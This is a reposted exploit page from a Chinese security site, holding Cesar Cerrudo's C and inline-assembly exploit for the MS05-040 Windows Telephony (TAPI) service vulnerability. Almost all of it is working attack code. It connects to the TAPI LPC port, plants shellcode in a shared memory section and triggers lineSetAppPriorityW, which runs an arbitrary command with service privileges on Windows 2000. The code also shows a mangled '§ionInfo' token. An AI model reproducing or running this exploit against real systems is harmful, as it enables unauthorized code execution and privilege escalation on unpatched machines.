首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Windows Telephony Service Command Execution (Exploit, MS05-040)
来源:www.argeniss.com 作者:Cesar 发布时间:2006-03-16  

Microsoft Windows Telephony Service Command Execution (Exploit, MS05-040)


A vulnerability exits in the Telephony Application Programming Interface (TAPI) service that could allow remote code execution. This exploit will remotely execute command on the machine running TAPI service vulnerable to MS05-040.

Credit:
The information has been provided by Cesar Cerrudo.
The related article can be found at: Vulnerability in Telephony Service Allows Remote Code Execution (MS05-040)

Details
Exploit:
// by Cesar Cerrudo - Argeniss - www.argeniss.com
//
// TAPI Vulnerability- MS05-040
//
// Should work on Win2k sp0,sp1,sp2,sp3,sp4 any language
// If Telephony Service is not running you can start it by net start "Telephony Service"

#include "windows.h"
#include "stdio.h"
#include "tapi.h"

typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;


typedef struct LpcSectionMapInfo{
DWORD Length;
DWORD SectionSize;
DWORD ServerBaseAddress;
} LPCSECTIONMAPINFO;


typedef struct LpcSectionInfo {
DWORD Length;
HANDLE SectionHandle;
DWORD Param1;
DWORD SectionSize;
DWORD ClientBaseAddress;
DWORD ServerBaseAddress;
} LPCSECTIONINFO;

#define SHARED_SECTION_SIZE 0x1000

typedef struct _OBJDIR_INFORMATION {
UNICODE_STRING ObjectName;
UNICODE_STRING ObjectTypeName;
BYTE Data[1];
} OBJDIR_INFORMATION;

typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
UNICODE_STRING *ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;

#define InitializeObjectAttributes( p, n, a, r, s ) { \
(p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
(p)->RootDirectory = r; \
(p)->Attributes = a; \
(p)->ObjectName = n; \
(p)->SecurityDescriptor = s; \
(p)->SecurityQualityOfService = NULL; \
}

WCHAR * uString=(WCHAR *) HeapAlloc(GetProcessHeap(), 0, 0x100);
LPVOID lpLocalAddress,lpTargetAddress;


DWORD ConnectToLPCPort(){

HMODULE hNtdll;
HANDLE hPort;
LPCSECTIONINFO sectionInfo;
LPCSECTIONMAPINFO mapInfo;
byte ConnectDataBuffer[100];
DWORD Size = sizeof(ConnectDataBuffer);
WCHAR * uString=L"\\RPC Control\\tapsrvlpc";//TAPI LPC port
DWORD i;
UNICODE_STRING uStr;

for (i=0;i<100;i++)
ConnectDataBuffer[i]=0x0;


hNtdll=LoadLibrary("ntdll.dll");

DWORD (WINAPI * pfnNtConnectPort)(HANDLE*, UNICODE_STRING * ,SECURITY_QUALITY_OF_SERVICE*, DWORD*,DWORD*,DWORD*,DWORD*,DWORD*);
pfnNtConnectPort= (DWORD (WINAPI *)(HANDLE* ,UNICODE_STRING *,SECURITY_QUALITY_OF_SERVICE*, DWORD*, DWORD*,DWORD*,DWORD*,DWORD*))GetProcAddress(hNtdll,"NtConnectPort");

DWORD (WINAPI * pfnCreateSection)(HANDLE* ,DWORD,DWORD,PLARGE_INTEGER, DWORD,DWORD,DWORD);
pfnCreateSection= (DWORD (WINAPI *)(HANDLE* ,DWORD,DWORD,PLARGE_INTEGER, DWORD,DWORD,DWORD))GetProcAddress(hNtdll,"NtCreateSection");

HANDLE hSection;
LARGE_INTEGER SecSize;
DWORD maxSize=0;

SecSize.LowPart=0x1000;
SecSize.HighPart=0x0;

SECURITY_QUALITY_OF_SERVICE qos;
DWORD qosSize=4;
qos.Length =(DWORD)&qosSize;
qos.ImpersonationLevel =(_SECURITY_IMPERSONATION_LEVEL)0x2;
qos.ContextTrackingMode =0x01000101;
qos.EffectiveOnly =0x10000;

//create shared section
pfnCreateSection(&hSection, SECTION_ALL_ACCESS,NULL, &SecSize,PAGE_READWRITE,SEC_COMMIT ,NULL);

memset(§ionInfo, 0, sizeof(sectionInfo));
memset(&mapInfo, 0, sizeof(mapInfo));

sectionInfo.Length = 0x18;
sectionInfo.SectionHandle =hSection;
sectionInfo.SectionSize = SHARED_SECTION_SIZE;
mapInfo.Length = 0x0C;

uStr.Length = wcslen(uString)*2;
uStr.MaximumLength = wcslen(uString)*2+2;
uStr.Buffer =uString;

//connect to LPC port
if (!pfnNtConnectPort(&hPort,&uStr,&qos,(DWORD *)§ionInfo,(DWORD *)&mapInfo,&maxSize,(DWORD*)ConnectDataBuffer,&Size)){
lpLocalAddress =(LPVOID)sectionInfo.ClientBaseAddress ;
lpTargetAddress =(LPVOID)sectionInfo.ServerBaseAddress ;
return 1;
}

return 0;
}


int main(int argc, char* argv[])
{

HMODULE hKernel;
DWORD iStrLen;
FARPROC pWinExec,pExitThread;
LPSTR sCommand;


if (!argv[1]) {
printf("\nUsage :\n TapiExploit \"command\" \n");
printf("\nExample :\n TapiExploit \"cmd.exe\" \n");
exit(0);
}

iStrLen=strlen(argv[1]);

if(iStrLen>=65){
printf("\n\"command\" must be less than 65 chars.\n");
exit(0);
}

sCommand=argv[1];

if (!ConnectToLPCPort()){ //connect to TAPI LPC port
printf("Could not connect to LPC port \nTAPI service couldn't be running\nTry again.");
exit(0);
}


hKernel=LoadLibrary("Kernel32.dll");

// pWinExec=GetProcAddress(hKernel,"WinExec");
pWinExec=GetProcAddress(hKernel,"CreateProcessA");
pExitThread=GetProcAddress(hKernel,"ExitThread");

CHAR sWinSta[]="WinSta0\\Default";

//copy shellcode
_asm {

pushad

lea esi, Shellcode
mov edi, lpLocalAddress
add edi, 0x10
lea ecx, End
sub ecx, esi
push esi
push edi
cld
rep movsb

pop edi
pop esi
push edi

lea ecx, CommandBuf
sub ecx, esi
add edi, ecx
mov esi, sCommand
mov ecx, iStrLen
rep movsb
mov [edi], 0x00

pop edi
mov esi, pWinExec
mov [edi+0x0a], esi

mov esi, pExitThread
mov [edi+0x0e], esi


//////////////

add edi, 0x2f0
lea esi, sWinSta
mov ecx, 0xf
cld
rep movsb


///////////////


jmp Done

Shellcode:
jmp Start
// this gets overwritten
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff

CommandBuf: // this gets overwritten
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555

Start:
call getDelta

getDelta:
pop edx // Get shellcode/shared section pointer
push edx

/* push 0x1 // push 0x0 for hidden window
lea eax, [edx-0x47]
push eax // Command offset
call [edx-0x4f] // Call WinExec
*/

mov eax, edx
add eax,0x500

push eax //LPPROCESS_INFORMATION

add eax, 0x100
mov ebx, edx
xor bl, bl
lea ecx, [ebx+0x300]
lea ebx, [eax+0x8]
mov [ebx], ecx //set windows station and desktop
push eax //LPSTARTUPINFO
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0

lea eax, [edx-0x47]
push eax // Command offset

push 0x0
call [edx-0x4f] // Call create process

pop edx
call [edx-0x4b] // Call ExitThread

End:

Done:
popad

}


LPSTR lpszAppFilename=(LPSTR )HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x21C) ;
LINEEXTENSIONID ExtensionID;

memset(lpszAppFilename,0x58,0x21A);

_asm{
pushad

mov ebx, lpszAppFilename
lea ebx, [ebx+0x216]
mov eax, lpTargetAddress
add eax, 0x10
mov [ebx], eax

popad
}

lineSetAppPriorityW((LPWSTR )lpszAppFilename,NULL, &ExtensionID,LINEREQUESTMODE_MAKECALL,NULL,NULL);

Sleep(1000);

printf("Command should have been executed ;)\n");

return 0;

}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apple OSX Mail.app RFC1740 Rea
·KnowledgebasePublisher 1.2 Rem
·PeerCast nextCGIarg Function R
·MyBB version 1.04 and prior SQ
·PeerCast nextCGIarg Function R
·Mercur IMAPD Buffer Overflow (
·Dvbbs 7.1 boke.asp SQL Injecti
·A vulnerability in HT 9.1 Expl
·Denial of Service exploit for
·X.Org X11 (X11R6.9.0/X11R7.0)
·Norton AntiVirus Crasher Explo
·BomberClone Buffer Overflow Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved